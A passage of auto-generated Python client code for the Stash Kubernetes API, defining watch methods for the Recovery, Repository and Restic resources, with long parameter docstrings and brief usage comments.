        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method watch_stash_appscode_com_v1alpha1_namespaced_recovery" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'name' is set
        if ('name' not in params or
                params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']  # noqa: E501
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/recoveries/{name}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def watch_stash_appscode_com_v1alpha1_namespaced_recovery_list(self, namespace, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_namespaced_recovery_list  # noqa: E501

        watch individual changes to a list of Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list(namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async'):
            return self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, **kwargs)  # noqa: E501
        else:
            (data) = self.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, **kwargs)  # noqa: E501
            return data

    def watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(self, namespace, **kwargs):  # noqa: E501
        """watch_stash_appscode_com_v1alpha1_namespaced_recovery_list  # noqa: E501

        watch individual changes to a list of Recovery  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list_with_http_info(namespace, async=True)
        >>> result = thread.get()

        :param async bool
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
        :param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
        :param bool include_uninitialized: If true, partially initialized resources are included in the response.
        :param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
        :param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
        :param str pretty: If 'true', then the output is pretty printed.
        :param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
        :param int timeout_seconds: Timeout for the list/watch call.
        :param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
        :return: IoK8sApimachineryPkgApisMetaV1WatchEvent
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method watch_stash_appscode_com_v1alpha1_namespaced_recovery_list" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params or
                params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_recovery_list`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']  # noqa: E501

        query_params = []
        if '_continue' in params:
            query_params.append(('continue', params['_continue']))  # noqa: E501
        if 'field_selector' in params:
            query_params.append(('fieldSelector', params['field_selector']))  # noqa: E501
        if 'include_uninitialized' in params:
            query_params.append(('includeUninitialized', params['include_uninitialized']))  # noqa: E501
        if 'label_selector' in params:
            query_params.append(('labelSelector', params['label_selector']))  # noqa: E501
        if 'limit' in params:
            query_params.append(('limit', params['limit']))  # noqa: E501
        if 'pretty' in params:
            query_params.append(('pretty', params['pretty']))  # noqa: E501
        if 'resource_version' in params:
            query_params.append(('resourceVersion', params['resource_version']))  # noqa: E501
        if 'timeout_seconds' in params:
            query_params.append(('timeoutSeconds', params['timeout_seconds']))  # noqa: E501
        if 'watch' in params:
            query_params.append(('watch', params['watch']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = []  # noqa: E501

        return self.api_client.call_api(
            '/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/recoveries', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
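    # Usage sketch (illustrative comment, not generated code): the client
    # instantiation below is an assumption about the surrounding package;
    # only the method name is taken from this file. With async=True the
    # call returns a thread-like handle whose .get() blocks for the
    # deserialized IoK8sApimachineryPkgApisMetaV1WatchEvent result:
    #
    #     api = StashV1alpha1Api()  # hypothetical API class name
    #     thread = api.watch_stash_appscode_com_v1alpha1_namespaced_recovery_list(
    #         'default', watch=True, async=True)
    #     result = thread.get()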
def watch_stash_appscode_com_v1alpha1_namespaced_repository(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
watch changes to an object of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
data = self.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, **kwargs)  # noqa: E501
return data
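# Hedged usage sketch (not part of the generated client): watching a single
# Repository object for changes. The class name `StashV1alpha1Api`, the
# configured `api_client`, and the namespace/name values below are
# illustrative assumptions, not names confirmed by this file.
#
#     api = StashV1alpha1Api(api_client)
#     thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository(
#         'my-repo', 'default', timeout_seconds=30, async=True)
#     watch_event = thread.get()  # IoK8sApimachineryPkgApisMetaV1WatchEvent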
def watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository # noqa: E501
watch changes to an object of kind Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param bool async: if True, perform the request asynchronously and return the request thread
:param str name: name of the Repository (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server-defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error indicating that the client must restart its list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is the maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) when all requested objects are filtered out, so clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument, in which case they return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit; that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of each object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/repositories/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats,
# 'async' is a reserved word in Python >= 3.7; pass it via **-expansion
**{'async': params.get('async')})  # noqa: E501
def watch_stash_appscode_com_v1alpha1_namespaced_repository_list(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository_list # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_list(namespace, async=True)
>>> result = thread.get()
:param bool async: if True, perform the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server-defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error indicating that the client must restart its list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is the maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) when all requested objects are filtered out, so clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument, in which case they return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit; that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of each object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, **kwargs) # noqa: E501
else:
data = self.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, **kwargs)  # noqa: E501
return data
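# Hedged usage sketch (not part of the generated client): watching all
# Repository objects in a namespace that match a label selector. The `api`
# variable is assumed to be a configured instance of this API class, and the
# namespace and selector values are illustrative.
#
#     events = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_list(
#         'default', label_selector='app=stash', timeout_seconds=60)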
def watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository_list # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, async=True)
>>> result = thread.get()
:param bool async: if True, perform the request asynchronously and return the request thread
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server-defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error indicating that the client must restart its list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is the maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested number of items (possibly zero) when all requested objects are filtered out, so clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument, in which case they return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit; that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and it ensures that a client using limit to receive smaller chunks of a very large result can see all possible objects. If objects are updated during a chunked list, the version of each object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for a list: if unset, the result is returned from remote storage based on the quorum-read flag; if '0', the result is whatever is currently in cache, with no guarantee of freshness; if set to a non-zero value, the result is at least as fresh as the given resourceVersion.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_repository_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats,
# 'async' is a reserved word in Python >= 3.7; pass it via **-expansion
**{'async': params.get('async')})  # noqa: E501
def watch_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
watch changes to an object of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, async=True)
>>> result = thread.get()
:param bool async: if True, perform the request asynchronously and return the request thread
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server-defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue), and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid, whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error indicating that the client must restart its list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
